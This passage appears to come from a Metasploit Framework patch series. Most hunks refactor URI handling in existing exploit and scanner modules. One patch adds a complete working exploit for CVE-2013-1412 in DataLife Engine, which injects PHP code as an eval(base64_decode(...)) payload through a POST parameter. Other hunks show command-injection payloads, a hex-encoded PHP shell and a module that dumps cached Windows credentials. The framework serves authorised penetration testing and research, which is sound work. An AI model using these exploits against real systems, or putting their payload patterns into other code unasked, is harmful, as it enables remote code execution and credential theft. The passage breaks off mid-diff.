"#{uri}wp-content/affiliate_images/#{$1}.php" + 'uri' => normalize_uri(uri, "wp-content/affiliate_images", "#{$1}.php") }) if res and res.code != 200 diff --git a/modules/exploits/unix/webapp/phpbb_highlight.rb b/modules/exploits/unix/webapp/phpbb_highlight.rb index 60dc44e64303..f19ece646e11 100644 --- a/modules/exploits/unix/webapp/phpbb_highlight.rb +++ b/modules/exploits/unix/webapp/phpbb_highlight.rb @@ -70,7 +70,7 @@ def find_topic 1.upto(32) do |x| res = send_request_raw({ - 'uri' => normalize_uri(datastore['URI']) + '/viewtopic.php?topic=' + x.to_s, + 'uri' => normalize_uri(datastore['URI'], '/viewtopic.php') + '?topic=' + x.to_s, }, 25) if (res and res.body.match(/class="postdetails"/)) @@ -92,14 +92,14 @@ def exploit return else - sploit = normalize_uri(datastore['URI']) + "/viewtopic.php?t=#{topic}&highlight=" + sploit = normalize_uri(datastore['URI'], "/viewtopic.php") + "?t=#{topic}&highlight=" case target.name when /Automatic/ req = "/viewtopic.php?t=#{topic}&highlight=%2527%252ephpinfo()%252e%2527" res = send_request_raw({ - 'uri' => normalize_uri(datastore['URI']) + req + 'uri' => normalize_uri(datastore['URI'], req) }, 25) print_status("Trying to determine which attack method to use...") diff --git a/modules/exploits/unix/webapp/phpmyadmin_config.rb b/modules/exploits/unix/webapp/phpmyadmin_config.rb index f215e4b11a46..55f894ffc361 100644 --- a/modules/exploits/unix/webapp/phpmyadmin_config.rb +++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb @@ -74,7 +74,7 @@ def initialize(info = {}) def exploit # First, grab the session cookie and the CSRF token print_status("Grabbing session cookie and CSRF token") - uri = normalize_uri(datastore['URI']) + "/scripts/setup.php" + uri = normalize_uri(datastore['URI'], "/scripts/setup.php") response = send_request_raw({ 'uri' => uri}) if !response fail_with(Exploit::Failure::NotFound, "Failed to retrieve hash, server may not be vulnerable.") @@ -101,7 +101,7 @@ def exploit # Now that we've got the cookie and token, send the evil print_status("Sending save request") response = send_request_raw({ - 'uri' => normalize_uri(datastore['URI']) + "/scripts/setup.php", + 'uri' => normalize_uri(datastore['URI'], "/scripts/setup.php"), 'method' => 'POST', 'data' => data, 'cookie' => cookie, @@ -120,7 +120,7 @@ def exploit response = send_request_raw({ # Allow findsock payloads to work 'global' => true, - 'uri' => normalize_uri(datastore['URI']) + "/config/config.inc.php" + 'uri' => normalize_uri(datastore['URI'], "/config/config.inc.php") }, timeout) handler diff --git a/modules/exploits/unix/webapp/projectpier_upload_exec.rb b/modules/exploits/unix/webapp/projectpier_upload_exec.rb index 06af2b28c79d..4b5b2a474518 100644 --- a/modules/exploits/unix/webapp/projectpier_upload_exec.rb +++ b/modules/exploits/unix/webapp/projectpier_upload_exec.rb @@ -63,7 +63,7 @@ def check res = send_request_cgi( { 'method' => 'GET', - 'uri' => "#{base}/index.php", + 'uri' => normalize_uri("#{base}/index.php"), 'vars_get' => { 'c' => 'access', diff --git a/modules/exploits/unix/webapp/redmine_scm_exec.rb b/modules/exploits/unix/webapp/redmine_scm_exec.rb index 83de69d3d734..9de06547ac8b 100644 --- a/modules/exploits/unix/webapp/redmine_scm_exec.rb +++ b/modules/exploits/unix/webapp/redmine_scm_exec.rb @@ -55,7 +55,7 @@ def initialize(info = {}) def exploit command = Rex::Text.uri_encode(payload.encoded) - urlconfigdir = normalize_uri(datastore['URI']) + "/repository/annotate?rev=`#{command}`" + urlconfigdir = normalize_uri(datastore['URI'], "/repository/annotate") + "?rev=`#{command}`" res = send_request_raw({ 'uri' => urlconfigdir, diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb index 6e1c95852ac0..07465ee23686 100644 --- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb +++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb @@ -57,7 +57,7 @@ def initialize(info = {}) def check res = send_request_raw({ - 'uri' => normalize_uri(datastore['URI']) + '/index.php' + 'uri' => normalize_uri(datastore['URI'], '/index.php') }, 25) if (res and res.body =~ /Simple PHP Blog (\d)\.(\d)\.(\d)/) @@ -79,7 +79,7 @@ def check def retrieve_password_hash(file) res = send_request_raw({ - 'uri' => normalize_uri(datastore['URI']) + file, + 'uri' => normalize_uri(datastore['URI'], file) }, 25) if (res and res.message == "OK" and res.body) @@ -94,7 +94,7 @@ def retrieve_password_hash(file) def create_new_password(user, pass) res = send_request_cgi({ - 'uri' => normalize_uri(datastore['URI']) + '/install03_cgi.php', + 'uri' => normalize_uri(datastore['URI'], '/install03_cgi.php'), 'method' => 'POST', 'data' => "user=#{user}&pass=#{pass}", }, 25) @@ -109,7 +109,7 @@ def create_new_password(user, pass) def retrieve_session(user, pass) res = send_request_cgi({ - 'uri' => normalize_uri(datastore['URI']) + "/login_cgi.php", + 'uri' => normalize_uri(datastore['URI'], "/login_cgi.php"), 'method' => 'POST', 'data' => "user=#{user}&pass=#{pass}", }, 25) @@ -139,7 +139,7 @@ def upload_page(session, dir, newpage, contents) data << "\r\n--#{boundary}--" res = send_request_raw({ - 'uri' => normalize_uri(datastore['URI']) + "/upload_img_cgi.php", + 'uri' => normalize_uri(datastore['URI'], "/upload_img_cgi.php"), 'method' => 'POST', 'data' => data, 'headers' => @@ -160,7 +160,7 @@ def upload_page(session, dir, newpage, contents) def reset_original_password(hash, scriptlocation) res = send_request_cgi({ - 'uri' => normalize_uri(datastore['URI']) + scriptlocation, + 'uri' => normalize_uri(datastore['URI'], scriptlocation), 'method' => 'POST', 'data' => "hash=" + hash, }, 25) @@ -177,7 +177,7 @@ def delete_file(file) delete_path = "/comment_delete_cgi.php?y=05&m=08&comment=.#{file}" res = send_request_raw({ - 'uri' => normalize_uri(datastore['URI']) + delete_path, + 'uri' => normalize_uri(datastore['URI'], delete_path), }, 25) if (res) diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb index 40311c1ed3f7..9f8aadb6213c 100644 --- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb @@ -75,7 +75,6 @@ def on_new_session(client) def exploit base = normalize_uri(target_uri.path) - base << '/' if base[-1, 1] != '/' @peer = "#{rhost}:#{rport}" username = datastore['USERNAME'] @@ -89,7 +88,7 @@ def exploit res = send_request_cgi( { - 'uri' => "#{base}index.php" , + 'uri' => normalize_uri(base, "index.php") , 'method' => "POST", 'headers' => { diff --git a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb index a051069c938e..99f57424e15e 100644 --- a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb @@ -58,7 +58,7 @@ def initialize(info = {}) def check res = send_request_raw( { - 'uri' => normalize_uri(datastore['URI']) + "/tiki-index.php", + 'uri' => normalize_uri(datastore['URI'], "/tiki-index.php"), 'method' => 'GET', 'headers' => { @@ -155,8 +155,7 @@ def exploit # when exploiting this vulnerability :) # def build_uri(f_val) - uri = normalize_uri(datastore['URI']) - uri << "/tiki-graph_formula.php?" + uri = normalize_uri(datastore['URI'], "/tiki-graph_formula.php?") # Requirements: query = '' diff --git a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb index c2f500447e3d..7fac9b73f102 100644 --- a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb @@ -59,7 +59,7 @@ def initialize(info = {}) def check res = send_request_raw( { - 'uri' => normalize_uri(datastore['URI']) + "/tiki-index.php", + 'uri' => normalize_uri(datastore['URI'], "/tiki-index.php"), 'method' => 'GET' }, 25) @@ -82,7 +82,7 @@ def exploit end def create_temp_file - url_jhot = normalize_uri(datastore['URI']) + "/jhot.php" + url_jhot = normalize_uri(datastore['URI'], "/jhot.php") scode = "\x0d\x0a\x3c\x3f\x70\x68\x70\x0d\x0a\x2f\x2f\x20\x24\x48\x65\x61" + @@ -153,7 +153,7 @@ def create_temp_file end def exe_command(cmd) - url_config = normalize_uri(datastore['URI']) + "/img/wiki/tiki-config.php" + url_config = normalize_uri(datastore['URI'], "/img/wiki/tiki-config.php") res = send_request_raw({ 'uri' => url_config, @@ -182,7 +182,7 @@ def exe_command(cmd) end def remove_temp_file - url_config = normalize_uri(datastore['URI']) + "/img/wiki/tiki-config.php" + url_config = normalize_uri(datastore['URI'], "/img/wiki/tiki-config.php") res = send_request_raw({ 'uri' => url_config, diff --git a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb index f6908cbf6d02..bb5f625e5670 100644 --- a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb @@ -78,7 +78,7 @@ def on_new_session(client) end def exploit - base = normalize_uri(target_uri.path) + base = target_uri.path base << '/' if base[-1, 1] != '/' @upload_php = rand_text_alpha(rand(4) + 4) + ".php" @peer = "#{rhost}:#{rport}" @@ -86,7 +86,7 @@ def exploit print_status("#{@peer} - Disclosing the path of the Tiki Wiki on the filesystem") res = send_request_cgi( - 'uri' => "#{base}tiki-rss_error.php" + 'uri' => normalize_uri(base, "tiki-rss_error.php") ) if not res or res.code != 200 or not res.body =~ /[> ](\/.*)tiki-rss_error\.php/ @@ -112,7 +112,7 @@ def exploit res = send_request_cgi( { - 'uri' => "#{base}tiki-print_multi_pages.php", + 'uri' => normalize_uri(base, "tiki-print_multi_pages.php"), 'method' => 'POST', 'vars_post' => { 'printpages' => printpages @@ -129,7 +129,7 @@ def exploit res = send_request_cgi( { 'method' => 'GET', - 'uri' => "#{base + @upload_php}", + 'uri' => normalize_uri(base, @upload_php), 'headers' => { 'Cmd' => Rex::Text.encode_base64(payload.encoded) } diff --git a/modules/exploits/unix/webapp/twiki_history.rb b/modules/exploits/unix/webapp/twiki_history.rb index 42bccd1b2f70..98b628b9f868 100644 --- a/modules/exploits/unix/webapp/twiki_history.rb +++ b/modules/exploits/unix/webapp/twiki_history.rb @@ -61,8 +61,8 @@ def initialize(info = {}) # def check test_file = rand_text_alphanumeric(8+rand(8)) - cmd_base = normalize_uri(datastore['URI']) + '/view/Main/TWikiUsers?rev=' - test_url = normalize_uri(datastore['URI']) + '/' + test_file + cmd_base = normalize_uri(datastore['URI'], '/view/Main/TWikiUsers?rev=') + test_url = normalize_uri(datastore['URI'], test_file) # first see if it already exists (it really shouldn't) res = send_request_raw({ @@ -109,7 +109,7 @@ def exploit rev = rand_text_numeric(1+rand(5)) rev << ' `' + payload.encoded + '`#' - query_str = normalize_uri(datastore['URI']) + '/view/Main/TWikiUsers' + query_str = normalize_uri(datastore['URI'], '/view/Main/TWikiUsers') query_str << '?rev=' query_str << Rex::Text.uri_encode(rev) diff --git a/modules/exploits/unix/webapp/twiki_search.rb b/modules/exploits/unix/webapp/twiki_search.rb index 741f7eef42a5..b27a6f4e2366 100644 --- a/modules/exploits/unix/webapp/twiki_search.rb +++ b/modules/exploits/unix/webapp/twiki_search.rb @@ -56,8 +56,8 @@ def initialize(info = {}) def check content = rand_text_alphanumeric(16+rand(16)) test_file = rand_text_alphanumeric(8+rand(8)) - cmd_base = normalize_uri(datastore['URI']) + '/view/Main/WebSearch?search=' - test_url = normalize_uri(datastore['URI']) + '/view/Main/' + test_file + cmd_base = normalize_uri(datastore['URI'], '/view/Main/WebSearch?search=') + test_url = normalize_uri(datastore['URI'], '/view/Main/', test_file) # first see if it already exists (it really shouldn't) res = send_request_raw({ @@ -105,13 +105,13 @@ def exploit search = rand_text_alphanumeric(1+rand(8)) search << "';" + payload.encoded + ";#\'" - query_str = normalize_uri(datastore['URI']) + '/view/Main/WebSearch' + query_str = normalize_uri(datastore['URI'], '/view/Main/WebSearch') query_str << '?search=' query_str << Rex::Text.uri_encode(search) res = send_request_cgi({ 'method' => 'GET', - 'uri' => query_str, + 'uri' => query_str, }, 25) if (res and res.code == 200) diff --git a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb index c73b3b2499c1..e38a0979c8a6 100644 --- a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb +++ b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb @@ -62,7 +62,7 @@ def initialize(info={}) def check - res = send_request_raw({'uri'=>normalize_uri(target_uri.host)}) + res = send_request_raw({'uri'=>normalize_uri(target_uri.path)}) if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-1]\<\/div\>/ return Exploit::CheckCode::Vulnerable diff --git a/modules/exploits/windows/http/sybase_easerver.rb b/modules/exploits/windows/http/sybase_easerver.rb index e0959186453e..3fd2b947b875 100644 --- a/modules/exploits/windows/http/sybase_easerver.rb +++ b/modules/exploits/windows/http/sybase_easerver.rb @@ -70,7 +70,7 @@ def exploit # Sending the request res = send_request_cgi({ - 'uri' => normalize_uri(datastore['DIR']) + '/Login.jsp?' + crash, + 'uri' => normalize_uri(datastore['DIR'], '/Login.jsp?') + crash, 'method' => 'GET', 'headers' => { 'Accept' => '*/*', diff --git a/modules/exploits/windows/http/sysax_create_folder.rb b/modules/exploits/windows/http/sysax_create_folder.rb index 76322d9aab6e..9d43164587b5 100644 --- a/modules/exploits/windows/http/sysax_create_folder.rb +++ b/modules/exploits/windows/http/sysax_create_folder.rb @@ -126,11 +126,11 @@ def get_sid pass = datastore['SysaxPASS'] creds = "fd=#{Rex::Text.encode_base64(user+"\x0a"+pass)}" - uri = normalize_uri(target_uri.to_s) + uri = target_uri.to_s # Login to get SID value r = send_request_cgi({ 'method' => "POST", - 'uri' => "#{uri}/scgi?sid=0&pid=dologin", + 'uri' => normalize_uri("#{uri}/scgi?sid=0&pid=dologin"), 'data' => creds }) @@ -148,7 +148,7 @@ def get_root_path(sid) random_folder_name = rand_text_alpha(8) # This folder should not exist in the root dir uri normalize_uri(target_uri.to_s) r = send_request_cgi({ - 'uri' => "#{uri}/scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm", + 'uri' => normalize_uri("#{uri}/scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm"), 'method' => 'POST', }) @@ -184,7 +184,7 @@ def exploit post_data.bound = rand_text_numeric(57) # example; "---------------------------12816808881949705206242427669" uri = normalize_uri(target_uri.to_s) r = send_request_cgi({ - 'uri' => "#{uri}/scgi?sid=#{sid}&pid=mk_folder2_name1.htm", + 'uri' => normalize_uri("#{uri}/scgi?sid=#{sid}&pid=mk_folder2_name1.htm"), 'method' => 'POST', 'data' => post_data.to_s, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", diff --git a/modules/exploits/windows/iis/ms02_065_msadc.rb b/modules/exploits/windows/iis/ms02_065_msadc.rb index 137a1686c862..b97524a3df7f 100644 --- a/modules/exploits/windows/iis/ms02_065_msadc.rb +++ b/modules/exploits/windows/iis/ms02_065_msadc.rb @@ -85,7 +85,7 @@ def exploit data = 'Content-Type: ' + sploit res = send_request_raw({ - 'uri' => normalize_uri(datastore['PATH']) + '/AdvancedDataFactory.Query', + 'uri' => normalize_uri(datastore['PATH'], '/AdvancedDataFactory.Query'), 'headers' => { 'Content-Length' => data.length, diff --git a/modules/exploits/windows/iis/msadc.rb b/modules/exploits/windows/iis/msadc.rb index 60d1f7b81448..d3383308dfc0 100644 --- a/modules/exploits/windows/iis/msadc.rb +++ b/modules/exploits/windows/iis/msadc.rb @@ -128,7 +128,7 @@ def exec_cmd(sql, cmd, d) data << sploit res = send_request_raw({ - 'uri' => normalize_uri(datastore['PATH']) + '/' + method, + 'uri' => normalize_uri(datastore['PATH'], method), 'agent' => 'ACTIVEDATA', 'headers' => { @@ -200,7 +200,7 @@ def find_exec data << "\r\n\r\n--#{boundary}--\r\n" res = send_request_raw({ - 'uri' => normalize_uri(datastore['PATH']) + '/VbBusObj.VbBusObjCls.GetMachineName', + 'uri' => normalize_uri(datastore['PATH'], '/VbBusObj.VbBusObjCls.GetMachineName'), 'agent' => 'ACTIVEDATA', 'headers' => { From 66ca906bfb7b1d7bffecc8e6e45905f98fe88b8f Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 31 Jan 2013 01:56:05 -0600 Subject: [PATCH 207/421] This is a string, not a variable --- modules/exploits/multi/http/mobilecartly_upload_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/mobilecartly_upload_exec.rb b/modules/exploits/multi/http/mobilecartly_upload_exec.rb index 61f076de2f71..34ea77ce51df 100644 --- a/modules/exploits/multi/http/mobilecartly_upload_exec.rb +++ b/modules/exploits/multi/http/mobilecartly_upload_exec.rb @@ -109,7 +109,7 @@ def exploit # Run payload # print_status("#{@peer} - Requesting '#{php_fname}'") - send_request_cgi({ 'uri' => normalize_uri(base, pages, php_fname) }) + send_request_cgi({ 'uri' => normalize_uri(base, 'pages', php_fname) }) handler end From 4de5e475c30358656821252021686240e919fac2 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 31 Jan 2013 02:15:50 -0600 Subject: [PATCH 208/421] Fix check --- modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb index e38a0979c8a6..c73b3b2499c1 100644 --- a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb +++ b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb @@ -62,7 +62,7 @@ def initialize(info={}) def check - res = send_request_raw({'uri'=>normalize_uri(target_uri.path)}) + res = send_request_raw({'uri'=>normalize_uri(target_uri.host)}) if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-1]\<\/div\>/ return Exploit::CheckCode::Vulnerable From 365e1b055749fc33a9d2550335ad1c3b96fe3a82 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Thu, 31 Jan 2013 16:09:14 +0100 Subject: [PATCH 209/421] added module for cve-2013-1412 --- .../unix/webapp/datalife_preview_exec.rb | 94 +++++++++++++++++++ 1 file changed, 94 insertions(+) create mode 100644 modules/exploits/unix/webapp/datalife_preview_exec.rb diff --git a/modules/exploits/unix/webapp/datalife_preview_exec.rb b/modules/exploits/unix/webapp/datalife_preview_exec.rb new file mode 100644 index 000000000000..2d3a1398ff4d --- /dev/null +++ b/modules/exploits/unix/webapp/datalife_preview_exec.rb @@ -0,0 +1,94 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DataLife Engine preview.php PHP Code Injection', + 'Description' => %q{ + This module exploits a PHP code injection vulnerability DataLife Engine 9.7. + The vulnerability exists in preview.php, due to an insecure usage of preg_replace() + with the e modifier, which allows to inject arbitrary php code, when the template + in use contains a [catlist] or [not-catlist] tag. + }, + 'Author' => + [ + 'EgiX', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2013-1412' ], + [ 'BID', '57603' ], + [ 'EDB', '24438' ], + [ 'URL', 'http://karmainsecurity.com/KIS-2013-01' ], + [ 'URL', 'http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html' ] + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Payload' => + { + 'Keys' => ['php'] + }, + 'DisclosureDate' => 'Jan 28 2013', + 'Targets' => [ ['DataLife Engine 9.7', { }], ], + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [ true, "The base path to the web application", "/"]) + ], self.class) + end + + def base + base = normalize_uri(target_uri.path) + return base + end + + def check + fingerprint = rand_text_alpha(4+rand(4)) + res = send_request_cgi( + { + 'uri' => "#{base}/engine/preview.php", + 'method' => 'POST', + 'vars_post' => + { + 'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//" + } + }) + + if res and res.code == 200 and res.body =~ /#{fingerprint}/ + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + end + + def exploit + @peer = "#{rhost}:#{rport}" + + print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code") + res = send_request_cgi( + { + 'uri' => "#{base}/engine/preview.php", + 'method' => 'POST', + 'vars_post' => + { + 'catlist[0]' => "#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//" + } + }) + end +end From b2ce9302c6258438880c0d5a71455bd0c2d2e34f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Thu, 31 Jan 2013 16:59:49 +0100 Subject: [PATCH 210/421] uri normalization in the old way --- modules/exploits/unix/webapp/datalife_preview_exec.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/unix/webapp/datalife_preview_exec.rb b/modules/exploits/unix/webapp/datalife_preview_exec.rb index 2d3a1398ff4d..6a120a8a3141 100644 --- a/modules/exploits/unix/webapp/datalife_preview_exec.rb +++ b/modules/exploits/unix/webapp/datalife_preview_exec.rb @@ -55,6 +55,7 @@ def initialize(info = {}) def base base = normalize_uri(target_uri.path) + base << '/' if base[-1, 1] != '/' return base end @@ -62,7 +63,7 @@ def check fingerprint = rand_text_alpha(4+rand(4)) res = send_request_cgi( { - 'uri' => "#{base}/engine/preview.php", + 'uri' => "#{base}engine/preview.php", 'method' => 'POST', 'vars_post' => { @@ -83,7 +84,7 @@ def exploit print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code") res = send_request_cgi( { - 'uri' => "#{base}/engine/preview.php", + 'uri' => "#{base}engine/preview.php", 'method' => 'POST', 'vars_post' => { From 4d7daacfb42ff2f38c0fbcea64307dae74510d03 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 31 Jan 2013 11:55:11 -0600 Subject: [PATCH 211/421] I wanna know where it's stored --- modules/post/windows/gather/cachedump.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb index a6299a173be4..579522017420 100644 --- a/modules/post/windows/gather/cachedump.rb +++ b/modules/post/windows/gather/cachedump.rb @@ -524,11 +524,13 @@ def run if( @vista == 1 ) print_status("Hash are in MSCACHE_VISTA format. (mscash2)") - store_loot("mscache2.creds", "text/csv", session, @credentials.to_csv, "mscache2_credentials.txt", "MSCACHE v2 Credentials") + p = store_loot("mscache2.creds", "text/csv", session, @credentials.to_csv, "mscache2_credentials.txt", "MSCACHE v2 Credentials") + print_status("MSCACHE v2 saved in: #{p}") else print_status("Hash are in MSCACHE format. (mscash)") - store_loot("mscache.creds", "text/csv", session, @credentials.to_csv, "mscache_credentials.txt", "MSCACHE v1 Credentials") + p = store_loot("mscache.creds", "text/csv", session, @credentials.to_csv, "mscache_credentials.txt", "MSCACHE v1 Credentials") + print_status("MSCACHE v1 saved in: #{p}") end rescue ::Interrupt From 5332e80ae940f9f59371ebe42829c71a2fe48640 Mon Sep 17 00:00:00 2001 From: egypt <egypt@metasploit.com> Date: Thu, 31 Jan 2013 14:18:42 -0600 Subject: [PATCH 212/421] Fix errant use of .to_s instead of .path --- .../scanner/http/apache_activemq_source_disclosure.rb | 2 +- .../scanner/http/atlassian_crowd_fileaccess.rb | 4 ++-- modules/auxiliary/scanner/http/dolibarr_login.rb | 2 +- modules/auxiliary/scanner/http/glassfish_login.rb | 2 +- modules/auxiliary/scanner/http/vcms_login.rb | 2 +- modules/exploits/multi/http/php_cgi_arg_injection.rb | 4 +--- .../windows/http/php_apache_request_headers_bof.rb | 2 +- .../windows/http/sonicwall_scrutinizer_sqli.rb | 2 +- modules/exploits/windows/http/sysax_create_folder.rb | 10 +++++----- .../exploits/windows/mysql/scrutinizer_upload_exec.rb | 2 +- 10 files changed, 15 insertions(+), 17 deletions(-) diff --git a/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb b/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb index 6f1ada9d1002..18d2d942abe9 100644 --- a/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb @@ -47,7 +47,7 @@ def initialize(info = {}) def run_host(ip) print_status("#{rhost}:#{rport} - Sending request...") - uri = normalize_uri(target_uri.to_s) + uri = normalize_uri(target_uri.path) res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', diff --git a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb index e94787a50ac1..d3e7d5f4ecfd 100644 --- a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb +++ b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb @@ -57,7 +57,7 @@ def rport end def run_host(ip) - uri = normalize_uri(target_uri.to_s) + uri = normalize_uri(target_uri.path) res = send_request_cgi({ 'uri' => uri, 'method' => 'GET'}) @@ -71,7 +71,7 @@ def run_host(ip) end def accessfile(rhost) - uri = normalize_uri(target_uri.to_s) + uri = normalize_uri(target_uri.path) print_status("#{rhost}:#{rport} Connecting to Crowd SOAP Interface") soapenv = 'http://schemas.xmlsoap.org/soap/envelope/' diff --git a/modules/auxiliary/scanner/http/dolibarr_login.rb b/modules/auxiliary/scanner/http/dolibarr_login.rb index 97a97ae75d52..dfbaca5d16fe 100644 --- a/modules/auxiliary/scanner/http/dolibarr_login.rb +++ b/modules/auxiliary/scanner/http/dolibarr_login.rb @@ -112,7 +112,7 @@ def do_login(user, pass) end def run - @uri = normalize_uri(target_uri) + @uri = normalize_uri(target_uri.path) @uri.path << "/" if @uri.path[-1, 1] != "/" @peer = "#{rhost}:#{rport}" diff --git a/modules/auxiliary/scanner/http/glassfish_login.rb b/modules/auxiliary/scanner/http/glassfish_login.rb index a48c352431b6..a58f98fb73fd 100644 --- a/modules/auxiliary/scanner/http/glassfish_login.rb +++ b/modules/auxiliary/scanner/http/glassfish_login.rb @@ -218,7 +218,7 @@ def run_host(ip) #Get GlassFish version edition, version, banner = get_version(res) - path = normalize_uri(target_uri) + path = normalize_uri(target_uri.path) target_url = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}" print_status("#{target_url} - GlassFish - Attempting authentication") diff --git a/modules/auxiliary/scanner/http/vcms_login.rb b/modules/auxiliary/scanner/http/vcms_login.rb index 7afdc7e61d1d..a4fe31dba260 100644 --- a/modules/auxiliary/scanner/http/vcms_login.rb +++ b/modules/auxiliary/scanner/http/vcms_login.rb @@ -108,7 +108,7 @@ def do_login(user, pass) end def run - @uri = normalize_uri(target_uri) + @uri = normalize_uri(target_uri.path) @uri.path << "/" if @uri.path[-1, 1] != "/" @peer = "#{rhost}:#{rport}" diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index 2f45fc760244..a245a3cd457f 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -96,11 +96,9 @@ def exploit ] qs = args.join() - uri = normalize_uri(target_uri) + uri = normalize_uri(target_uri.path) uri = "#{uri}?#{qs}" - #print_status("URI: #{target_uri}?#{qs}") # Uncomment to preview URI - # Has to be all on one line, so gsub out the comments and the newlines payload_oneline = "<?php " + payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "") response = send_request_cgi( { diff --git a/modules/exploits/windows/http/php_apache_request_headers_bof.rb b/modules/exploits/windows/http/php_apache_request_headers_bof.rb index 253866b1c89d..be89cbc5a488 100644 --- a/modules/exploits/windows/http/php_apache_request_headers_bof.rb +++ b/modules/exploits/windows/http/php_apache_request_headers_bof.rb @@ -103,7 +103,7 @@ def exploit print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") res = send_request_cgi({ - 'uri' => normalize_uri(target_uri.to_s), + 'uri' => normalize_uri(target_uri.path), 'method' => 'GET', 'headers' => { diff --git a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb index c73b3b2499c1..e38a0979c8a6 100644 --- a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb +++ b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb @@ -62,7 +62,7 @@ def initialize(info={}) def check - res = send_request_raw({'uri'=>normalize_uri(target_uri.host)}) + res = send_request_raw({'uri'=>normalize_uri(target_uri.path)}) if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-1]\<\/div\>/ return Exploit::CheckCode::Vulnerable diff --git a/modules/exploits/windows/http/sysax_create_folder.rb b/modules/exploits/windows/http/sysax_create_folder.rb index 9d43164587b5..1e678f874d81 